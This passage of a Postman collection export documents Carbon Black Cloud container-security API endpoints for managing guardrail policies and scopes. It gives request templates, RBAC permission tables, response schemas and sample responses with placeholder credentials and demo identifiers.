Key"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies/{{cb_container_policy_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 04 May 2023 03:43:09 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"631"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"7c2e674d-d882-4965-aee3-089dbf57adf4"}],"cookie":[],"responseTime":null,"body":"{\n    \"policy_id\": \"12a345cde-0a9b-464a-804e-0cbb3201c68f\",\n    \"name\": \"demo-policy\",\n    \"scope_metadata\": {\n        \"scope_id\": \"123456a7-a607-4377-8ca3-d1020ad8fb85\",\n        \"scope_name\": \"sample-scope\"\n    },\n    \"creator\": \"demouser@demoorg.com\",\n    \"created_on\": 1631168658409,\n    \"created_on_iso\": \"2021-09-09T06:24:18.409Z\",\n    \"modified_by\": \"demouser@demoorg.com\",\n    \"modified_on\": 1655988483580,\n    \"modified_on_iso\": \"2022-06-23T12:48:03.58Z\",\n    \"rules\": [\n        {\n            \"id\": \"demo-rule\",\n            \"action\": \"alert\",\n            \"is_enabled\": true\n        }\n    ],\n    \"exceptions\": {},\n    \"include_init_containers\": false,\n    \"include_ephemeral_containers\": true,\n    \"status\": \"enabled\"\n}"}],"_postman_id":"21cf8936-1336-48da-bff6-93e179fb2f88"},{"name":"Get All Policies","id":"f613700e-254e-4f97-8dbe-eab4ff4b48be","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies","description":"<p>This request returns the list of Container policies configured in the system. Policies are used to in order to define the misconfigurations, or rules we want to enforce on resources in the selected scope.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">[\n  {\n    \"policy_id\": \"&lt;uuid&gt;\",\n    \"name\": \"&lt;string&gt;\",\n    \"status\": \"&lt;string&gt;\",\n    \"creator\": \"&lt;string&gt;\",\n    \"created_on\": &lt;integer&gt;,\n    \"created_on_iso\": \"&lt;string&gt;\",\n    \"modified_by\": \"&lt;string&gt;\",\n    \"modified_on\": &lt;integer&gt;,\n    \"modified_on_iso\": \"&lt;string&gt;\",\n    \"scope_metadata\": {\n      \"scope_id\": \"&lt;uuid&gt;\",\n      \"scope_name\": \"&lt;string&gt;\"\n    },\n    \"exceptions_count\": &lt;integer&gt;,\n    \"violations_count\": &lt;integer&gt;\n  }\n]\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","policies"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"5e19211d-0675-4121-a26e-447093a70c6d","name":"Get All Policies","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 03 May 2023 03:14:55 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"7e0be5ec-2e9e-46b7-8772-e92f82193003"}],"cookie":[],"responseTime":null,"body":"{\n    \"items\": [\n      {\n          \"policy_id\": \"a12bc3d4-d1bb-4859-ad3d-da21efb2ca2f\",\n          \"name\": \"Demo Policy\",\n          \"scope_metadata\": {\n              \"scope_id\": \"12a34b5c-519f-4580-8d95-78738075dc63\",\n              \"scope_name\": \"demo-scope\"\n          },\n          \"exceptions_count\": 1,\n          \"creator\": \"demouser@demoorg.com\",\n          \"created_on\": 1655190366737,\n          \"created_on_iso\": \"2022-06-14T07:06:06.737Z\",\n          \"modified_by\": \"demouser@demoorg.com\",\n          \"modified_on\": 1666703636607,\n          \"modified_on_iso\": \"2022-10-25T13:13:56.607Z\",\n          \"status\": \"enabled\"\n}"}],"_postman_id":"f613700e-254e-4f97-8dbe-eab4ff4b48be"},{"name":"Create or Update Policy","id":"e04f85ce-2c26-4634-ae95-ccdb5735df41","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"Demo-Policy\",\n    \"include_init_containers\": false,\n    \"include_ephemeral_containers\": true,\n    \"scope_id\": \"ee58a110-62f4-482b-9fb4-09f6ef8b1994\",\n    \"rules\": [\n        {\n            \"id\": \"deny-ephemeral-containers\",\n            \"action\": \"alert\",\n            \"is_enabled\": true\n        }\n    ],\n    \"exceptions\": {},\n    \"status\": \"enabled\"\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies","description":"<p>This request enables the user to create or update a policy.<br />Policies are used to in order to define the misconfigurations or rules we want to enforce on resources in the selected scope.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>CREATE, READ, UPDATE, DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"name\": \"&lt;string&gt;\",\n    \"scope_id\": \"&lt;uuid&gt;\",\n    \"status\": \"&lt;string&gt;\",\n    \"rules\": [\n        {\n            \"id\": \"&lt;string&gt;\",\n            \"action\": \"&lt;string&gt;\",\n            \"is_enabled\": &lt;boolean&gt;,\n            \"preset_id\": \"&lt;string&gt;\",\n            \"preset_name\": \"&lt;string&gt;\"\n        }\n    ],\n    \"exceptions\": {\n        \"ruleId1\": [\n            {\n                \"name\": \"&lt;string&gt;\",\n                \"username\": \"&lt;string&gt;\",\n                \"labels\": [\n                    {\n                        \"key\": \"&lt;string&gt;\",\n                        \"value\": \"&lt;string&gt;\"\n                    }\n                ]\n            }\n        ]\n    },\n    \"include_init_containers\": &lt;boolean&gt;,\n    \"include_ephemeral_containers\": &lt;boolean&gt;,\n    \"policy_id\": \"&lt;uuid&gt;\"\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","policies"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"37951def-6795-4dd5-b275-fdab3fed658c","name":"Create Policy","originalRequest":{"method":"PUT","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"Demo-Policy\",\n    \"include_init_containers\": false,\n    \"include_ephemeral_containers\": true,\n    \"scope_id\": \"ee58a110-62f4-482b-9fb4-09f6ef8b1994\",\n    \"rules\": [\n        {\n            \"id\": \"deny-ephemeral-containers\",\n            \"action\": \"alert\",\n            \"is_enabled\": true\n        }\n    ],\n    \"exceptions\": {},\n    \"status\": \"enabled\"\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 10 May 2023 03:37:52 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"53"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"6e213973-0d05-4505-bfac-493b822d88d6"}],"cookie":[],"responseTime":null,"body":"{\n    \"policy_id\": \"0e58ef37-15e5-482b-a4a1-68a84e179845\"\n}"},{"id":"814da83a-ea94-4d74-8486-94cf4bf5ced7","name":"Update Policy","originalRequest":{"method":"PUT","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"policy_id\": \"0e58ef37-15e5-482b-a4a1-68a84e179845\",\n    \"name\": \"Demo-Policy\",\n    \"scope_id\": \"ee58a110-62f4-482b-9fb4-09f6ef8b1994\",\n    \"rules\": [\n        {\n            \"id\": \"deny-ephemeral-containers\",\n            \"action\": \"alert\",\n            \"is_enabled\": true\n        },\n        {\n            \"id\": \"company-banned-list\",\n            \"action\": \"alert\",\n            \"is_enabled\": false\n        }\n    ],\n    \"exceptions\": {},\n    \"include_init_containers\": false,\n    \"include_ephemeral_containers\": true,\n    \"status\": \"enabled\"\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 10 May 2023 03:42:53 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"53"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"7108bf1c-6c4d-4682-9cab-3f61d87c13ad"}],"cookie":[],"responseTime":null,"body":"{\n    \"policy_id\": \"0e58ef37-15e5-482b-a4a1-68a84e179845\"\n}"}],"_postman_id":"e04f85ce-2c26-4634-ae95-ccdb5735df41"},{"name":"Delete Policy","id":"35658321-c659-4808-9fc8-ba5bf61ad671","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies/{{cb_container_policy_id}}","description":"<p>This request deletes the policy object specified by the policy id.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","policies","{{cb_container_policy_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[{"id":"514ecde1-76ee-4f16-a699-363d2e29ed03","type":"any","value":"<uuid>","key":"policyId"}]}},"response":[{"id":"29f66da4-3393-4af6-afb5-cdb6c24d4d4a","name":"Delete Policy","originalRequest":{"method":"DELETE","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies/{{cb_container_policy_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"plain","header":[{"key":"Date","value":"Wed, 10 May 2023 04:27:27 GMT"},{"key":"Content-Length","value":"0"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"49d67e6e-b031-495b-9d2e-e39c03e690e1"}],"cookie":[],"responseTime":null,"body":null}],"_postman_id":"35658321-c659-4808-9fc8-ba5bf61ad671"}],"id":"34bb68be-89c9-498d-8b92-feaaf7cc6d24","description":"<p>Endpoints that operate on policys.</p>\n","_postman_id":"34bb68be-89c9-498d-8b92-feaaf7cc6d24","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Scopes","item":[{"name":"Get Specified Scope","id":"c0d98489-b699-4177-a13b-c314121284f1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/scopes/{{cb_container_scope_id}}","description":"<p>Get the scope object for the specified scope id.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"scope_id\": \"&lt;uuid&gt;\",\n  \"scope_name\": \"&lt;string&gt;\",\n  \"creator\": \"&lt;string&gt;\",\n  \"created_on\": &lt;integer&gt;,\n  \"modified_by\": \"&lt;string&gt;\",\n  \"modified_on\": &lt;integer&gt;,\n  \"is_protected\": &lt;boolean&gt;,\n  \"lifecycle_phase\": \"&lt;string&gt;\",\n  \"clusters_groups\": [\n    \"&lt;string&gt;\"\n  ],\n  \"clusters\": [\n    \"&lt;string&gt;\"\n  ],\n  \"namespaces\": [\n    \"&lt;string&gt;\"\n  ],\n  \"grouping_type\": \"&lt;string&gt;\",\n  \"workloads_count\": &lt;integer&gt;\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","scopes","{{cb_container_scope_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[{"id":"825b470f-bb7b-4837-ac53-39b22f1d69db","type":"any","value":"<uuid>","key":"scopeId"}]}},"response":[{"id":"5c3c94b0-85b5-4e10-bfae-831934cea7e5","name":"Get Scope","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/scopes/{{cb_container_scope_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 04 May 2023 04:53:59 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"425"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"220619c5-11a9-4f84-a738-e998f86777ef"}],"cookie":[],"responseTime":null,"body":"{\n    \"scope_id\": \"12a3bc4d-ee56-7f8g-a11b-2345cd67e89e\",\n    \"name\": \"Updated Demo Scope 01\",\n    \"creator\": \"\",\n    \"created_on\": 1683174576876,\n    \"created_on_iso\": \"2023-05-04T04:29:36.876Z\",\n    \"modified_by\": \"\",\n    \"modified_on\": 1683174635458,\n    \"modified_on_iso\": \"2023-05-04T04:29:36.876Z\",\n    \"lifecycle_phase\": \"build\",\n    \"is_protected\": false,\n    \"clusters_groups\": [],\n    \"clusters\": [\n        \"demo:cluster\"\n    ],\n    \"namespaces\": [\n        \"*\"\n    ],\n    \"grouping_type\": \"destination\",\n    \"workloads_count\": 0\n}"}],"_postman_id":"c0d98489-b699-4177-a13b-c314121284f1"},{"name":"Get All Scopes","id":"c92a4fe1-f76a-42a4-9112-3af15fc50f8e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/scopes","description":"<p>This request returns the list of scopes configured in the system.<br />Scopes are used to in order to define a list of resources we want to track.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"items\": [\n    {\n      \"scope_id\": \"&lt;uuid&gt;\",\n      \"scope_name\": \"&lt;string&gt;\",\n      \"creator\": \"&lt;string&gt;\",\n      \"created_on\": &lt;integer&gt;,\n      \"modified_by\": \"&lt;string&gt;\",\n      \"modified_on\": &lt;integer&gt;,\n      \"is_protected\": &lt;boolean&gt;,\n      \"lifecycle_phase\": \"&lt;string&gt;\",\n      \"clusters_groups\": [\n        \"&lt;string&gt;\"\n      ],\n      \"clusters\": [\n        \"&lt;string&gt;\"\n      ],\n      \"namespaces\": [\n        \"&lt;string&gt;\"\n      ],\n      \"grouping_type\": \"&lt;string&gt;\",\n      \"workloads_count\": &lt;integer&gt;\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","scopes"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"ea075a73-a0ec-4f52-9761-2a229317d376","name":"Get All Scopes","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/scopes"},"status":"OK","code":200,"_postman_previewlanguage":"Text","header":[{"key":"Date","value":"Thu, 04 May 2023 05:02:54 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"fe9b4613-7e51-49b7-9399-95b39619e03b"}],"cookie":[],"responseTime":null,"body":"{\n    \"items\": [\n        {\n            \"scope_id\": \"12a3bc4d-ee56-7f8g-a11b-2345cd67e89e\",\n            \"name\": \"Updated Demo Scope 01\",\n            \"creator\": \"\",\n            \"created_on\": 1683174576876,\n            \"created_on_iso\": \"2023-05-04T04:29:36.876Z\",\n            \"modified_by\": \"\",\n            \"modified_on\": 1683174635458,\n            \"modified_on_iso\": \"2023-05-04T04:29:36.876Z\",\n            \"lifecycle_phase\": \"build\",\n            \"is_protected\": false,\n            \"clusters_groups\": [],\n            \"clusters\": [\n                \"demo:cluster\"\n            ],\n            \"namespaces\": [\n                \"*\"\n            ],\n            \"grouping_type\": \"destination\",\n            \"workloads_count\": 0\n        }\n    ]\n}"}],"_postman_id":"c92a4fe1-f76a-42a4-9112-3af15fc50f8e"},{"name":"Get Scope With Policy","id":"72431f53-057c-47f6-a561-6f6ac0744b23","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies_scopes/{{cb_container_scope_id}}","description":"<p>This request returns the scope for a provided scope id, with the policy that is applied on it.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"scope_id\": \"&lt;uuid&gt;\",\n  \"name\": \"&lt;string&gt;\",\n  \"policy_metadata\": {\n    \"policy_id\": \"&lt;uuid&gt;\",\n    \"policy_name\": \"&lt;string&gt;\"\n  },\n  \"lifecycle_phase\": \"&lt;string&gt;\",\n  \"workload_count\": &lt;number&gt;\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","policies_scopes","{{cb_container_scope_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[{"id":"48928d1b-3258-481f-878d-1ff5bec5b334","type":"any","value":"<uuid>","key":"scopeId"}]}},"response":[{"id":"4d5bfc54-aa9c-4fea-971b-9307ee749ecc","name":"Get Scope With Policy","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies_scopes/{{cb_container_scope_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 10 May 2023 19:09:07 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"144"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"75a2c603-4519-4071-9c40-589c5fbc75bc"}],"cookie":[],"responseTime":null,"body":"{\n    \"scope_id\": \"92aa9f26-dc59-4864-8c58-9be1230de9d5\",\n    \"name\": \"demo scope\",\n    \"policy_metadata\": {\n        \"policy_id\": \"5839f6b3-1760-4288-bf75-dbad8f81fbc2\",\n        \"policy_name\": \"demo policy name\"\n    },\n    \"workload_count\": 0,\n    \"lifecycle_phase\": \"deployed\"\n}"}],"_postman_id":"72431f53-057c-47f6-a561-6f6ac0744b23"},{"name":"Get All Scopes With Policies","id":"7a039bef-d7d4-4f76-a6ce-6e7c8f0519da","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/policies_scopes","description":"<p>Get the list of scopes configured in the system and the policy that is applied on each.</p>\n<p>Can be used to determine what scope can be used when creating a new policy.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">[\n  {\n    \"scope_id\": \"&lt;uuid&gt;\",\n    \"name\": \"&lt;string&gt;\",\n    \"policy_metadata\": {\n      \"policy_id\": \"&lt;uuid&gt;\",\n      \"policy_name\": 